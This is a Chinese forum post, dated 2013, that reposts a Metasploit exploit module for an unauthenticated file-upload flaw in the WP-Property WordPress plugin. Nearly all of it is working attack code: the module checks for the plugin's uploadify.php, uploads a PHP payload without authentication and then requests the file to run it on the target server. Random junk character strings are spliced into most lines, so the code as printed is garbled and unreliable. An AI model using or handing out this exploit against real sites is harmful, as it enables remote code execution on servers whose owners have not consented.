WordPress WP-Property PHP 文件上传漏洞! u) a F3 c4 r$ _" |
6 J$ ~. C4 C2 O" ^+ c' t ## # This file is part of the Metasploit Framework and may be subject to
7 u) w" n% E8 q9 q% D1 }# z' K3 C9 t, e& X- ?
# redistribution and commercial restrictions. Please see the Metasploit
9 ^; n/ U9 c# G x0 r, j! V' W8 Z4 }" [3 _0 U1 P* P% a
# Framework web site for more information on licensing and terms of use.
* e5 M6 s! N2 m$ O) E! i K! T! _8 _; K5 s% p: @& Q7 `
# http://metasploit.com/framework/ ## U( W. F5 s- a
( c: q$ d; |+ O. P {
; }6 ?/ ]: M6 k: b, q/ t' f$ i2 L
1 u- q& ^3 |; I. R9 i/ P
) J/ u: H* l4 }require 'msf/core'+ Q5 f8 L7 G+ `5 V; `
require 'msf/core/exploit/php_exe'
$ D( c8 N3 o8 [. X2 _& A' Z4 Q- D3 z$ w
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
: m" l0 ~$ q0 P'Description' => %q{
0 x1 e/ Y. F& G3 r# g; aThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>. J9 Z# V- T9 K$ U
[
% ]5 t9 P1 o. w( _' o7 H/ _0 F( u'Sammy FORGIT', # initial discovery
" |; W0 x/ H$ p+ \% |'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ J# d4 D5 d+ q' e9 C9 S
],
, h L# v# o/ [9 u" J'License' => MSF_LICENSE,
) B6 |- P# B) |/ ?3 A'References' =>5 y, }" [3 m2 M: Q6 F
[6 D5 P6 \# a+ T _" [9 Z: S$ y6 `
[ 'OSVDB', '82656' ],1 }, n+ |8 B6 m( ~ e7 Y
[ 'BID', '53787' ]," }$ |' P! I* r# R6 k ~* `
[ 'EDB', '18987'],
0 s7 R! G& ^# L K0 U8 R1 y+ V% E[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
3 L- Z3 s4 V& `; X% Y],% z& T8 r0 A1 g
'Payload' =>4 m2 | X z2 o g! ]
{% O7 G& q7 b5 n
'BadChars' => "\x00",) V( o: t+ H A+ }
},7 ]3 i9 _& G( x$ P
'Platform' => 'php',' J0 i2 |5 m% I4 c" ~1 j
'Arch' => ARCH_PHP,
! A5 e b; a$ K9 u" I7 N, d'Targets' =>
4 G7 J2 f4 T% C( ~5 j[8 w5 r( x: p+ Z6 I
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],5 g' w1 B/ Z" S3 O2 I3 Q" u
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]8 j! c+ H6 w- Q# m% i
],
" Y- k5 y8 y7 M/ |- ?5 }'DefaultTarget' => 0,! X2 I! b0 d3 X6 s
'DisclosureDate' => 'Mar 26 2012'))
3 y& d8 k* {' R5 t
8 X' a. S4 K: M* t& |4 M, xregister_options(% S" |& R+ V' Y6 Q
[+ r B( {5 d' Y. \ i
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
3 [2 t) d' t7 Z. l) U0 f], self.class)
, r6 t# K2 `* x' P" ~end
' x$ H+ z4 W3 s6 i0 c ?
8 t3 ?, B m1 [0 ?def check
& ?" ]9 W% C6 M; ?2 O9 Y, kuri = target_uri.path8 b9 K1 N& Z9 l- ?+ o
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
( {: @5 ~# m+ L( \5 ^'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
, N( L t0 e: W})' }# ]: w% N7 d$ }. o# l
" P' {6 V! q8 w( O/ C
if not res or res.code != 200
2 R' B* D/ v/ _/ z* \$ Areturn Exploit::CheckCode::Unknown
& d! @! F7 p% h; O# @end
4 r+ a( a! E6 k: b% {6 m- h k5 z6 O: @4 G) O; p
return Exploit::CheckCode::Appears
0 D# p+ S- m" |/ nend; J) N( Y% U% y' Z# o5 M
/ l& W4 E# i5 X% t W
def exploit/ g4 T2 L( U+ x; }1 z& b& T
uri = target_uri.path
# Z: q" _- C% Z) v4 Huri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
8 o B b+ l5 k5 m, x) B/ x
3 { n3 i' g+ b6 G9 k! x1 U+ xdata = Rex::MIME::Message.new0 s% A5 S/ Y+ X% R) k4 r$ t: d
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""), j7 ~6 e0 j1 I! V# x; p7 ~
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")' n, J4 E. E. ]9 X8 R! N* e- G$ Q& u5 t6 o
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
9 h4 X% E9 s. d9 w0 X6 I* L; L- D3 v2 ^
print_status("#{peer} - Uploading payload #{@payload_name}")
& V4 a0 G; i& R5 A8 i; T: X5 rres = send_request_cgi({% p2 {6 E$ C$ a0 f5 l; _
'method' => 'POST',
$ k3 a" E, o, ^'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",( H" p' K. e- Z
'ctype' => "multipart/form-data; boundary=#{data.bound}",1 u1 G5 z" `; ~+ ^. Q; ], r
'data' => post_data
F& T5 k- N8 n* k3 j v})5 V) k. @8 i$ J2 l% g
4 E, T# D3 v( _4 k+ qif not res or res.code != 200 or res.body !~ /#{@payload_name}/
/ o' h+ l' B& hfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
- j# U# Q; ]; M9 k# Uend
- a, ~8 n: a: C0 f) s) c, d! W: T( v$ a' P
upload_uri = res.body7 Z& O" n a7 ^
) d) L. r9 }/ g) Z5 e7 ~; s Tprint_status("#{peer} - Executing payload #{@payload_name}")4 ?5 l: m+ G/ F- W3 s5 w% C
res = send_request_raw({
% B! P' l. J U'uri' => upload_uri,
9 c5 @# l1 U; M0 F+ X+ {'method' => 'GET') ~& w* M& b+ B5 J2 R3 W
})( I# u, H/ r6 a& P
end! a- M4 d z2 v9 q
end
1 @% w2 u- h' K/ p+ K3 G$ p. o3 l, b
2 F6 x! [5 l* n: N1 h& w2 E( c不要问我这写的是什么 怎么利用 我是说msf.
% N, N2 G9 m# p! X- ^# l% I B) q# }; H, l/ M) U4 @
|
发表于 2013-1-4 19:51:30
收藏
支持
反对